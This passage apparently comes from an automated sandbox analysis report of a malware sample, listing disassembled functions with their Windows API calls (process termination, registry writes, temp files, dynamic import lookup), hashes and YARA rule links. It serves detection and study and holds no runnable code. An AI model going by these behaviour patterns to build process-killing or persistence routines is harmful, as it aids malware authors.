                                                            • Opcode ID: 3a0e3256684355138030f6a0484e2ec14e26b4245de0c4748e4c17b84f4c929b
                                                            • Instruction ID: 07f8fea99ccef0613a0afc3dfec66562c66ab74f2622157708e8325ee286f66a
                                                            • Opcode Fuzzy Hash: 3a0e3256684355138030f6a0484e2ec14e26b4245de0c4748e4c17b84f4c929b
                                                            • Instruction Fuzzy Hash: CF11C1739012267797127B79BC84C6F36ACBF99A583054029F901B7200CE39FD02B7A0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04581A19, Relevance: 10.6, APIs: 7, Instructions: 62memorysynchronizationCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • RtlAllocateHeap.NTDLL(00000000,?), ref: 04581A4A
                                                            • wcstombs.NTDLL ref: 04581A5B
                                                              • Part of subcall function 0456CB3E: StrChrA.SHLWAPI(1D4E36C0,0000002E,00000000,00000000,?,1D4E36C0,0457DBAB,00000000,00000000,00000000), ref: 0456CB50
                                                              • Part of subcall function 0456CB3E: StrChrA.SHLWAPI(00000004,00000020,?,1D4E36C0,0457DBAB,00000000,00000000,00000000), ref: 0456CB5F
                                                            • OpenProcess.KERNEL32(00000001,00000000,?,00000000), ref: 04581A7C
                                                            • TerminateProcess.KERNEL32(00000000,00000000), ref: 04581A8B
                                                            • CloseHandle.KERNEL32(00000000), ref: 04581A92
                                                            • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 04581AA1
                                                            • WaitForSingleObject.KERNEL32(00000000), ref: 04581AB1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: HeapProcess$AllocateCloseFreeHandleObjectOpenSingleTerminateWaitwcstombs
                                                            • String ID:
                                                            • API String ID: 417118235-0
                                                            • Opcode ID: 1954bcac1ceadcd3329c3f9ffecd9158f1cdb9a090f159073e6f36342b89c501
                                                            • Instruction ID: 3d354bd7107e51192e7bc886f459a6f0c6a5d21e40d5844e30193244cdb8e966
                                                            • Opcode Fuzzy Hash: 1954bcac1ceadcd3329c3f9ffecd9158f1cdb9a090f159073e6f36342b89c501
                                                            • Instruction Fuzzy Hash: 1E118E31600616FBDB11AB55EC48BAA7BA8FB00745F141018F505B6181CFB9EC95EBA4
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0457AC39, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 59stringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 045790ED: GetTempPathA.KERNEL32(00000000,00000000,000003EE,?,00000000,?,?,?,04577791,00000929,00000000,?,?,045799D0,00000000,00000000), ref: 045790FF
                                                              • Part of subcall function 045790ED: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,04577791,00000929,00000000,?,?,045799D0,00000000,00000000,?,0000000E), ref: 04579118
                                                              • Part of subcall function 045790ED: GetCurrentThreadId.KERNEL32 ref: 04579125
                                                              • Part of subcall function 045790ED: GetSystemTimeAsFileTime.KERNEL32(0456EE33,?,?,?,04577791,00000929,00000000,?,?,045799D0,00000000,00000000,?,0000000E), ref: 04579131
                                                              • Part of subcall function 045790ED: GetTempFileNameA.KERNEL32(00000000,00000000,0456EE33,00000000,?,?,?,04577791,00000929,00000000,?,?,045799D0,00000000,00000000,?), ref: 0457913F
                                                              • Part of subcall function 045790ED: lstrcpy.KERNEL32(00000000), ref: 04579161
                                                            • lstrcpy.KERNEL32(-000000FC,00000000), ref: 0457AC73
                                                            • CreateDirectoryA.KERNEL32(00000000,00000000,?,00002365,00000000,?,0456C4A0,?,?,00000000,?,04562273,00000000), ref: 0457AC85
                                                            • GetTickCount.KERNEL32 ref: 0457AC90
                                                            • GetTempFileNameA.KERNEL32(00000000,00000000,00000000,?,00002365,00000000,?,0456C4A0,?,?,00000000,?,04562273,00000000), ref: 0457AC9C
                                                            • lstrcpy.KERNEL32(00000000), ref: 0457ACB6
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: Temp$Filelstrcpy$NamePathTime$CountCreateCurrentDirectorySystemThreadTick
                                                            • String ID: \Low
                                                            • API String ID: 1629304206-4112222293
                                                            • Opcode ID: 2f853ca8ae4e74ea517c2313833a1b5b31c299b5fb059412bc2ef9b5ecd09029
                                                            • Instruction ID: bb729eb37c676c2b4f0df36e73a35513092846e091ee837185e46c51ca405166
                                                            • Opcode Fuzzy Hash: 2f853ca8ae4e74ea517c2313833a1b5b31c299b5fb059412bc2ef9b5ecd09029
                                                            • Instruction Fuzzy Hash: F4018031601615BFE3116B75BC4CF5F7A9CFF85651B054038F511E6240CF18ED05A6B5
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0456B7B9, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 45timeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • wsprintfA.USER32 ref: 0456B7CC
                                                            • CreateWaitableTimerA.KERNEL32(00000000,00000001,?), ref: 0456B7DE
                                                            • SetWaitableTimer.KERNEL32(00000000,?,00000000,00000000,00000000,00000000), ref: 0456B808
                                                            • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 0456B81B
                                                            • CloseHandle.KERNEL32(?), ref: 0456B824
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: TimerWaitable$CloseCreateHandleMultipleObjectsWaitwsprintf
                                                            • String ID: 0x%08X
                                                            • API String ID: 603522830-3182613153
                                                            • Opcode ID: ca5c8302db72665b63317f1da4a1338fece72b43d905957a701ef9c52a7496ab
                                                            • Instruction ID: cf43ff89c79b01ee214df1cc942b9d73deea0fdde2514551a6e9069e290d2ec5
                                                            • Opcode Fuzzy Hash: ca5c8302db72665b63317f1da4a1338fece72b43d905957a701ef9c52a7496ab
                                                            • Instruction Fuzzy Hash: C1015E71900129BBCB10ABA4DC49DEF7F7CFF05354F104118F516E2181DB75AA05DBA0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04563543, Relevance: 9.2, APIs: 6, Instructions: 202synchronizationCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 04583C35: RtlAllocateHeap.NTDLL(00000000,?,04580BE2), ref: 04583C41
                                                            • GetLastError.KERNEL32(?,?,?,00001000), ref: 045635C4
                                                            • WaitForSingleObject.KERNEL32(00000000,00000000,?,?), ref: 04563649
                                                            • CloseHandle.KERNEL32(00000000), ref: 04563663
                                                            • OpenProcess.KERNEL32(00100000,00000000,00000000,?,?), ref: 04563698
                                                              • Part of subcall function 04583C5F: RtlReAllocateHeap.NTDLL(00000000,?,?,04563607), ref: 04583C6F
                                                            • WaitForSingleObject.KERNEL32(?,00000064), ref: 0456371A
                                                            • CloseHandle.KERNEL32(?), ref: 04563741
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: AllocateCloseHandleHeapObjectSingleWait$ErrorLastOpenProcess
                                                            • String ID:
                                                            • API String ID: 3115907006-0
                                                            • Opcode ID: f7c7a8fe6f5e837eddd54addecb8a9738712cab2641f65aa0ccd70419dc0baf7
                                                            • Instruction ID: 33683e9170ae2241397ec70ab9fa882f08f8c27ef109ad23782cd085d09edab9
                                                            • Opcode Fuzzy Hash: f7c7a8fe6f5e837eddd54addecb8a9738712cab2641f65aa0ccd70419dc0baf7
                                                            • Instruction Fuzzy Hash: 52812771A00219EFDF11DF98D984AADBBB5FF08744F148859E806BB250D731AE50EBA4
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0456A8B7, Relevance: 9.1, APIs: 6, Instructions: 133registrysynchronizationthreadCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 04580BC5: lstrlenW.KERNEL32(?,?,00000000,?,00000250,?,00000000), ref: 04580C11
                                                              • Part of subcall function 04580BC5: lstrlenW.KERNEL32(?,?,00000000,?,00000250,?,00000000), ref: 04580C1D
                                                              • Part of subcall function 04580BC5: memset.NTDLL ref: 04580C65
                                                              • Part of subcall function 04580BC5: FindFirstFileW.KERNEL32(00000000,00000000), ref: 04580C80
                                                              • Part of subcall function 04580BC5: lstrlenW.KERNEL32(0000002C), ref: 04580CB8
                                                              • Part of subcall function 04580BC5: lstrlenW.KERNEL32(?), ref: 04580CC0
                                                              • Part of subcall function 04580BC5: memset.NTDLL ref: 04580CE3
                                                              • Part of subcall function 04580BC5: wcscpy.NTDLL ref: 04580CF5
                                                            • WaitForSingleObject.KERNEL32(00000000,?,049B993C,?,00000000,00000000,00000001), ref: 0456A961
                                                            • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 0456A99B
                                                            • RegSetValueExA.ADVAPI32(?,?,00000000,00000004,00000000,00000004), ref: 0456A9BE
                                                            • RegCloseKey.ADVAPI32(?), ref: 0456A9C7
                                                            • WaitForSingleObject.KERNEL32(00000000,Function_00008936,0458C1E4), ref: 0456AA2B
                                                            • RtlExitUserThread.NTDLL(?), ref: 0456AA61
                                                              • Part of subcall function 04575EFC: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,00000008,00000000,00000000,?,?,04575A38,00000000,?,?), ref: 04575F1A
                                                              • Part of subcall function 04575EFC: GetFileSize.KERNEL32(00000000,00000000,?,?,04575A38,00000000,?,?,?,?,00000000,0456DBFF,?,?,?,?), ref: 04575F2A
                                                              • Part of subcall function 04575EFC: CloseHandle.KERNEL32(000000FF,?,?,04575A38,00000000,?,?,?,?,00000000,0456DBFF,?,?,?,?,00000000), ref: 04575F8C
                                                              • Part of subcall function 0457533D: CreateFileW.KERNEL32(00000000,C0000000,0457F1B3,00000000,0457F1B4,00000080,00000000,00000000,04584C6A,00000000,0457F1B3,?), ref: 0457537E
                                                              • Part of subcall function 0457533D: GetLastError.KERNEL32 ref: 04575388
                                                              • Part of subcall function 0457533D: WaitForSingleObject.KERNEL32(000000C8), ref: 045753AD
                                                              • Part of subcall function 0457533D: CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,?,00000080,00000000), ref: 045753CE
                                                              • Part of subcall function 0457533D: SetFilePointer.KERNEL32(00000001,00000000,00000000,00000002), ref: 045753F6
                                                              • Part of subcall function 0457533D: WriteFile.KERNEL32(00000001,00001388,?,00000002,00000000), ref: 0457540B
                                                              • Part of subcall function 0457533D: SetEndOfFile.KERNEL32(00000001), ref: 04575418
                                                              • Part of subcall function 0457533D: CloseHandle.KERNEL32(00000001), ref: 04575430
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: File$lstrlen$CloseCreateObjectSingleWait$Handlememset$ErrorExitFindFirstLastOpenPointerSizeThreadUserValueWritewcscpy
                                                            • String ID:
                                                            • API String ID: 90276831-0
                                                            • Opcode ID: f703438311a27bbd3305acbbd7ba9b7e56232c0bafbce2ea0efea0bf43517f43
                                                            • Instruction ID: 01e7f9102d26d15e1251c9e66c80b53509db7bbe158629ea9340e805196b9f11
                                                            • Opcode Fuzzy Hash: f703438311a27bbd3305acbbd7ba9b7e56232c0bafbce2ea0efea0bf43517f43
                                                            • Instruction Fuzzy Hash: A6515C71A00209AFDB11DFA4D885E9A77F9FB05704F01406AF605F7250EB74BE49EB60
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0456F0C0, Relevance: 9.1, APIs: 6, Instructions: 121memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • RtlImageNtHeader.NTDLL(?), ref: 0456F0D9
                                                              • Part of subcall function 045793FF: lstrlenW.KERNEL32(00000000,73BCF560,00000000,?,00000000), ref: 0457942B
                                                              • Part of subcall function 045793FF: RtlAllocateHeap.NTDLL(00000000,?), ref: 0457943D
                                                              • Part of subcall function 045793FF: CreateDirectoryW.KERNEL32(00000000,00000000), ref: 0457945A
                                                              • Part of subcall function 045793FF: lstrlenW.KERNEL32(00000000), ref: 04579466
                                                              • Part of subcall function 045793FF: HeapFree.KERNEL32(00000000,00000000), ref: 0457947A
                                                            • RtlEnterCriticalSection.NTDLL(00000000), ref: 0456F111
                                                            • CloseHandle.KERNEL32(?), ref: 0456F11F
                                                            • HeapFree.KERNEL32(00000000,?,?,00000001,?,?,00001000,?,?,00001000), ref: 0456F1F1
                                                            • RtlLeaveCriticalSection.NTDLL(00000000), ref: 0456F200
                                                            • HeapFree.KERNEL32(00000000,00000000,?,?,00001000,?,?,00001000), ref: 0456F213
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: Heap$Free$CriticalSectionlstrlen$AllocateCloseCreateDirectoryEnterHandleHeaderImageLeave
                                                            • String ID:
                                                            • API String ID: 1719504581-0
                                                            • Opcode ID: 491aca85316a47ab8324dcda6bbd380d779a2c87908d7a9c440326292ce31dd6
                                                            • Instruction ID: 9253c4e8445059fe36c9a1a2a7461fd9039d8e6408b766f60bb67ede57782d00
                                                            • Opcode Fuzzy Hash: 491aca85316a47ab8324dcda6bbd380d779a2c87908d7a9c440326292ce31dd6
                                                            • Instruction Fuzzy Hash: E3416F36A00606EBEB229F95FC84A9E77B9FB44744F104029E906A7250DF74F949FF90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0456DFA6, Relevance: 9.1, APIs: 6, Instructions: 117COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: b40d96e14d03e67b2c7088ee5be54131c6415e54a9e74da0b82129792a689457
                                                            • Instruction ID: ea70de28aa09f0bcb96fc8eb7ca7fa08f2cece54213f613244ad71a2c9e42915
                                                            • Opcode Fuzzy Hash: b40d96e14d03e67b2c7088ee5be54131c6415e54a9e74da0b82129792a689457
                                                            • Instruction Fuzzy Hash: B841B271601705AFD7209F25988992BBBE9FB84774B104A3DF2A7D35C0DB31B805EB61
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0456BFEF, Relevance: 9.1, APIs: 6, Instructions: 104stringsynchronizationCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 04574B63: lstrlen.KERNEL32(?,770F4620,00000000,?,00000000,04561211,?), ref: 04574B72
                                                              • Part of subcall function 04574B63: mbstowcs.NTDLL ref: 04574B8E
                                                            • lstrlenW.KERNEL32(00000000,?), ref: 0456C042
                                                              • Part of subcall function 04580BC5: lstrlenW.KERNEL32(?,?,00000000,?,00000250,?,00000000), ref: 04580C11
                                                              • Part of subcall function 04580BC5: lstrlenW.KERNEL32(?,?,00000000,?,00000250,?,00000000), ref: 04580C1D
                                                              • Part of subcall function 04580BC5: memset.NTDLL ref: 04580C65
                                                              • Part of subcall function 04580BC5: FindFirstFileW.KERNEL32(00000000,00000000), ref: 04580C80
                                                              • Part of subcall function 04580BC5: lstrlenW.KERNEL32(0000002C), ref: 04580CB8
                                                              • Part of subcall function 04580BC5: lstrlenW.KERNEL32(?), ref: 04580CC0
                                                              • Part of subcall function 04580BC5: memset.NTDLL ref: 04580CE3
                                                              • Part of subcall function 04580BC5: wcscpy.NTDLL ref: 04580CF5
                                                            • PathFindFileNameW.SHLWAPI(00000000,00000000,?,?,00000000,00000000,00000000), ref: 0456C063
                                                            • lstrlenW.KERNEL32(0456EE33), ref: 0456C08D
                                                              • Part of subcall function 04580BC5: PathFindFileNameW.SHLWAPI(0000001C,?,?,?,?,00000000), ref: 04580D1B
                                                              • Part of subcall function 04580BC5: RtlEnterCriticalSection.NTDLL(?), ref: 04580D50
                                                              • Part of subcall function 04580BC5: RtlLeaveCriticalSection.NTDLL(?), ref: 04580D6C
                                                              • Part of subcall function 04580BC5: FindNextFileW.KERNEL32(?,00000000), ref: 04580D85
                                                              • Part of subcall function 04580BC5: WaitForSingleObject.KERNEL32(00000000), ref: 04580D97
                                                              • Part of subcall function 04580BC5: FindClose.KERNEL32(?), ref: 04580DAC
                                                              • Part of subcall function 04580BC5: FindFirstFileW.KERNEL32(00000000,00000000), ref: 04580DC0
                                                              • Part of subcall function 04580BC5: lstrlenW.KERNEL32(0000002C), ref: 04580DE2
                                                            • LocalFree.KERNEL32(?,?,?,?,00000000,00000000,00000000), ref: 0456C0AA
                                                            • WaitForSingleObject.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000), ref: 0456C0C1
                                                            • PathFindFileNameW.SHLWAPI(0000001E), ref: 0456C0D6
                                                              • Part of subcall function 0457EDBE: lstrlenW.KERNEL32(00000000,?,00000002,00000000,?,?,?,0456C0ED,?,0000001E,?), ref: 0457EDD3
                                                              • Part of subcall function 0457EDBE: lstrlenW.KERNEL32(00000000,?,?,?,0456C0ED,?,0000001E,?), ref: 0457EDDB
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: lstrlen$Find$File$NamePath$CriticalFirstObjectSectionSingleWaitmemset$CloseEnterFreeLeaveLocalNextmbstowcswcscpy
                                                            • String ID:
                                                            • API String ID: 2670873185-0
                                                            • Opcode ID: 582288a1323d2a53b31d1d5676caa3aa140bc2ca7ca34a1b671ce5703083c2dc
                                                            • Instruction ID: 1be234818b12cb6dafced5d7e5dceba87ae65903e0d2ca4e840971e38e2d8c73
                                                            • Opcode Fuzzy Hash: 582288a1323d2a53b31d1d5676caa3aa140bc2ca7ca34a1b671ce5703083c2dc
                                                            • Instruction Fuzzy Hash: 40316E72504206AFDB11EF64D88482FBBF9FF98758F00092EF595A3150EB35ED09AB52
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0456CDCB, Relevance: 9.1, APIs: 6, Instructions: 91timememoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 0456CDE5
                                                            • CreateWaitableTimerA.KERNEL32(0458C1A8,00000001,?), ref: 0456CE02
                                                            • GetLastError.KERNEL32(?,00000000,04567AF7,00000000,00000000,00008008), ref: 0456CE13
                                                              • Part of subcall function 045768B2: RegQueryValueExA.KERNELBASE(00000000,04575AB0,00000000,04575AB0,00000000,?,00000000,00000000,00000000,00000001,73B74D40,04575AB0,04575AB0,?,045674AD,?), ref: 045768EA
                                                              • Part of subcall function 045768B2: RtlAllocateHeap.NTDLL(00000000,?), ref: 045768FE
                                                              • Part of subcall function 045768B2: RegQueryValueExA.ADVAPI32(00000000,04575AB0,00000000,04575AB0,00000000,?,?,045674AD,?,04575AB0,00000000,00000001,00000000,73B74D40), ref: 04576918
                                                              • Part of subcall function 045768B2: RegCloseKey.ADVAPI32(00000000,?,045674AD,?,04575AB0,00000000,00000001,00000000,73B74D40,?,?,?,04575AB0,00000000), ref: 04576942
                                                            • GetSystemTimeAsFileTime.KERNEL32(00000000,00000000,00000000,?,?,00000000,04567AF7,00000000,00000000,00008008), ref: 0456CE53
                                                            • SetWaitableTimer.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,?,00000000,04567AF7,00000000,00000000,00008008), ref: 0456CE72
                                                            • HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,04567AF7,00000000,00000000,00008008), ref: 0456CE88
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: TimerWaitable$HeapQueryTimeValue$AllocateCloseCreateErrorFileFreeLastOpenSystem
                                                            • String ID:
                                                            • API String ID: 1835239314-0
                                                            • Opcode ID: b4d31c13c23ba98bccaed730fa147801f3957acff44098bedf61bec45c8ec155
                                                            • Instruction ID: 70c195caba63e25f087b16cb62586f6853aa398ff98040f463d74a5ada3a3aa7
                                                            • Opcode Fuzzy Hash: b4d31c13c23ba98bccaed730fa147801f3957acff44098bedf61bec45c8ec155
                                                            • Instruction Fuzzy Hash: 2C315C71D00109EBCF22DFA5D889CAFBBB9FB84750B10841AF446E7101D734AE48EBA1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0456F7AF, Relevance: 9.1, APIs: 6, Instructions: 81libraryloaderCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 04583C35: RtlAllocateHeap.NTDLL(00000000,?,04580BE2), ref: 04583C41
                                                            • GetModuleHandleA.KERNEL32(?,00000020,?,?,?,?,?,?,045797AB,?,?,?,00000000,00000000), ref: 0456F7D4
                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 0456F7F6
                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 0456F80C
                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 0456F822
                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 0456F838
                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 0456F84E
                                                              • Part of subcall function 0457A21F: memset.NTDLL ref: 0457A2A0
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: AddressProc$AllocateHandleHeapModulememset
                                                            • String ID:
                                                            • API String ID: 1886625739-0
                                                            • Opcode ID: bf7cba2380d4185ed98f1b2652cefbeaa0189392926bebbc8b9aec573e67a5a2
                                                            • Instruction ID: 8a7fe24861464c964b9e454fcb637dfdc5ac6edc2c3a7b659667d883d705c244
                                                            • Opcode Fuzzy Hash: bf7cba2380d4185ed98f1b2652cefbeaa0189392926bebbc8b9aec573e67a5a2
                                                            • Instruction Fuzzy Hash: E8212EB2A0030ADFD750DF69E884E5A77FCFB49744B008569E50AE7311EB74E9059B60
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 045786BD, Relevance: 9.1, APIs: 6, Instructions: 78memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • StrChrA.SHLWAPI(00000000,00000020,00000000,?,00000000,?,?,?,04573BE7,00000000,?,0458BAA8,?,?,0458C140), ref: 045786D5
                                                            • StrChrA.SHLWAPI(00000001,00000020,?,?,?,04573BE7,00000000,?,0458BAA8,?,?,0458C140), ref: 045786E6
                                                              • Part of subcall function 045829DE: lstrlen.KERNEL32(?,04562DC6,00000000,00000000,?,0457DF3C,?,?,00000014,04562DC6,?,?), ref: 045829F0
                                                              • Part of subcall function 045829DE: StrChrA.SHLWAPI(?,0000000D,?,0457DF3C,?,?,00000014,04562DC6,?,?), ref: 04582A28
                                                            • RtlAllocateHeap.NTDLL(00000000,01000000,00000000), ref: 04578726
                                                            • memcpy.NTDLL(00000000,?,00000007,?,?,?,04573BE7,00000000,?,0458BAA8,?), ref: 04578753
                                                            • memcpy.NTDLL(00000000,0458C140,0458C140,00000000,?,00000007,?,?,?,04573BE7,00000000,?,0458BAA8,?), ref: 04578762
                                                            • memcpy.NTDLL(0458C140,?,?,00000000,0458C140,0458C140,00000000,?,00000007,?,?,?,04573BE7,00000000,?,0458BAA8), ref: 04578774
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: memcpy$AllocateHeaplstrlen
                                                            • String ID:
                                                            • API String ID: 1819133394-0
                                                            • Opcode ID: 4596cdb95fd5d2c974949cd248dca389dbe1da7c93dd435d9887e765fa6ff2d4
                                                            • Instruction ID: 8dc34e1345003fe5edd193635d9cd373e36a7cfd32ba864016ad2f4369ccd5d3
                                                            • Opcode Fuzzy Hash: 4596cdb95fd5d2c974949cd248dca389dbe1da7c93dd435d9887e765fa6ff2d4
                                                            • Instruction Fuzzy Hash: 25217C72500209BFDB11AF99DC84E9A7BACFF08754F044065F905AB251EA75FE44ABA0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04579EC9, Relevance: 9.1, APIs: 6, Instructions: 74memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,00000001,00000000,00000000,00000000,00000000,?,?,?,?,00000000,00000000), ref: 04579F08
                                                            • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 04579F19
                                                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,00000001,00000000,?,00000000,00000000), ref: 04579F34
                                                            • GetLastError.KERNEL32 ref: 04579F4A
                                                            • HeapFree.KERNEL32(00000000,?), ref: 04579F5C
                                                            • HeapFree.KERNEL32(00000000,?), ref: 04579F71
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: Heap$ByteCharFreeMultiWide$AllocateErrorLast
                                                            • String ID:
                                                            • API String ID: 1822509305-0
                                                            • Opcode ID: 9d9194ef5b05bc1f040665181a0ec5b3965d073278765d61e0590ea611734474
                                                            • Instruction ID: 12c614da98e6f6e8440625fb08f7c0e0d87db0a4b9fdaf84527105ba7d9e393b
                                                            • Opcode Fuzzy Hash: 9d9194ef5b05bc1f040665181a0ec5b3965d073278765d61e0590ea611734474
                                                            • Instruction Fuzzy Hash: 5B116AB6901128FBDB226B96EC48CEF7F7EFF452A0B000025F505E2151DA359A55FBB0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04583AA8, Relevance: 9.1, APIs: 6, Instructions: 67stringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • OpenProcess.KERNEL32(00000E39,00000000,?), ref: 04583AD0
                                                            • _strupr.NTDLL ref: 04583B0B
                                                            • lstrlen.KERNEL32(00000000), ref: 04583B13
                                                            • TerminateProcess.KERNEL32(00000000,00000000,?,00000000,?), ref: 04583B52
                                                            • CloseHandle.KERNEL32(00000000,00000000,00000000,?,00000104), ref: 04583B59
                                                            • GetLastError.KERNEL32 ref: 04583B61
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: Process$CloseErrorHandleLastOpenTerminate_struprlstrlen
                                                            • String ID:
                                                            • API String ID: 110452925-0
                                                            • Opcode ID: 55e3540ce5d7b1bdd550e30a17c241c7afea4d4c1b9aa8afe13497fb5d376403
                                                            • Instruction ID: 861188ba893557264acfec9e833e6e58def3c3ea939d22a4cf6a99aac5c6d676
                                                            • Opcode Fuzzy Hash: 55e3540ce5d7b1bdd550e30a17c241c7afea4d4c1b9aa8afe13497fb5d376403
                                                            • Instruction Fuzzy Hash: 371166B1600105EFDB117B75EC89D6A376DFBC8756F10141DF907F2040EE79A848A764
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0457DC0F, Relevance: 9.1, APIs: 6, Instructions: 66registrymemoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • RegOpenKeyA.ADVAPI32(80000001,?,73BCF710), ref: 0457DC2D
                                                            • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,?,00000000), ref: 0457DC5B
                                                            • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 0457DC6D
                                                            • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0457DC92
                                                            • HeapFree.KERNEL32(00000000,00000000), ref: 0457DCAD
                                                            • RegCloseKey.ADVAPI32(?), ref: 0457DCB7
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: HeapQueryValue$AllocateCloseFreeOpen
                                                            • String ID:
                                                            • API String ID: 170146033-0
                                                            • Opcode ID: b52ae9ced444af74a480551a91f65dd00ad03307c67dfcb79e2751ff2b496a9d
                                                            • Instruction ID: 96da1f43805ba2c9f38703d7f516e0bf4abcae54e5214df63ab09b510e394927
                                                            • Opcode Fuzzy Hash: b52ae9ced444af74a480551a91f65dd00ad03307c67dfcb79e2751ff2b496a9d
                                                            • Instruction Fuzzy Hash: D311FE76900108FFDB11DB95ED84CEE7BBDFB89604B104069F901E2115DB75AE49EB20
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0456B869, Relevance: 9.1, APIs: 6, Instructions: 65memorystringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • lstrlen.KERNEL32(00000F00,?,-00000001,00000000,?,?,?,04563F0E,?,00000000,000000FF,?,00000F00), ref: 0456B87A
                                                            • lstrlen.KERNEL32(?,?,-00000001,00000000,?,?,?,04563F0E,?,00000000,000000FF,?,00000F00), ref: 0456B881
                                                            • RtlAllocateHeap.NTDLL(00000000,00000020), ref: 0456B893
                                                            • _snprintf.NTDLL ref: 0456B8B9
                                                              • Part of subcall function 0457A976: memset.NTDLL ref: 0457A98B
                                                              • Part of subcall function 0457A976: lstrlenW.KERNEL32(00000000,00000000,00000000,?,00000000,?), ref: 0457A9C4
                                                              • Part of subcall function 0457A976: wcstombs.NTDLL ref: 0457A9CE
